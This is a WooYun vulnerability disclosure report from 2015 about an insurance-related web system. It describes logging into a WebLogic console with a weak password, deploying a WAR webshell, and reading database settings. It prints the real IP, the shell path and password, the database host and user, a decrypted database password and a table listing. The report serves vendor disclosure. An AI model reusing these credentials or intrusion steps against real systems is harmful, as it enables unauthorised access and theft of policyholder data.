乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-12: 细节已通知厂商并且等待厂商处理中 2015-12-16: 厂商已经确认,细节仅向厂商公开 2015-12-26: 细节向核心白帽子及相关领域专家公开 2016-01-05: 细节向普通白帽子公开 2016-01-15: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
RT
http://121.43.74.72:7005/tit-ydcd/
7005端口采用weblogic,存在弱口令weblogicweblogic1成功登陆!
下面就是部署war包getshell了!shell地址http://121.43.74.72:7005/ca/ma3.jsp密码carry
内网IP,可进一步威胁内网安全!
数据库配置信息
<jdbc-driver-params> <url>jdbc:mysql://rdsx89pe30tuivsptgpa1.mysql.rds.aliyuncs.com:3306/dyxptdb?zeroDateTimeBehavior=convertToNull</url> <driver-name>com.mysql.jdbc.Driver</driver-name> <properties> <property> <name>user</name> <value>dyxpt</value> </property> </properties> <password-encrypted>{AES}IYsCzrIFd5XZJT4ee30e3FVkagWgXr8Z5qWe6ZRmpzk=</password-encrypted> </jdbc-driver-params> <jdbc-connection-pool-params>
解密得dyxptdyxpt1505连上数据库!数据库为
某个数据库中的表
Query#0 : SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ='dyxptdb'TABLE_NAMEVARCHARauto_idbasicinfobindopercdlimitcdlimitchangeclaimclaimbillcountrycsvcomparisoncurserielementsemailfinancetranstracehebaokeepmanatranstracemenuoperinfopdf_recoderplatform_userpolicypictureposuserauthposversionmgrpremiuminfoprinttempletprpdcompanyqunarclaimsinforationauthrationcountryrationkindrationkindaddrationkindinforationlmtrationprerationprintrationskinrationspecrelationshiprightriskbasicinforiskclassriskclassbaseinforiskclassinforolerolepermissionsalerationseefeepayappflowstationstmenustoperinfostorgecsvstrolemenusttransappnostvouchert_bill_201507_tblt_bill_201508_tblt_bill_201509_tblt_bill_201510_tblt_bill_201511_tblt_bill_201512_tblt_dayrpbill_201507_tblt_dayrpbill_201508_tblt_dayrpbill_201509_tblt_dayrpbill_201510_tblt_dayrpbill_201511_tblt_dayrpbill_201512_tblt_dayrpholder_201507_tblt_dayrpholder_201508_tblt_dayrpholder_201509_tblt_dayrpholder_201510_tblt_dayrpholder_201511_tblt_dayrpholder_201512_tblt_dayrpinsured_201507_tblt_dayrpinsured_201508_tblt_dayrpinsured_201509_tblt_dayrpinsured_201510_tblt_dayrpinsured_201511_tblt_dayrpinsured_201512_tblt_dayrppolicy_201507_tblt_dayrppolicy_201508_tblt_dayrppolicy_201509_tblt_dayrppolicy_201510_tblt_dayrppolicy_201511_tblt_dayrppolicy_201512_tblt_dayrpresult_tblt_holder_201507_tblt_holder_201508_tblt_holder_201509_tblt_holder_201510_tblt_holder_201511_tblt_holder_201512_tblt_insured_201507_tblt_insured_201508_tblt_insured_201509_tblt_insured_201510_tblt_insured_201511_tblt_insured_201512_tblt_policy_201507_tblt_policy_201508_tblt_policy_201509_tblt_policy_201510_tblt_policy_201511_tblt_policy_201512_tblt_result_tblterminalinfotransappnotransappnoaonusermenuuserpermissionuserrolevalidatebaseinfovalidateinfovoperinfovouchervoucherversion
敏感信息就不翻了,仅做危害证明!
getshell数据未动,求20rank!
危害等级:高
漏洞Rank:10
确认时间:2015-12-16 10:33
已调整
暂无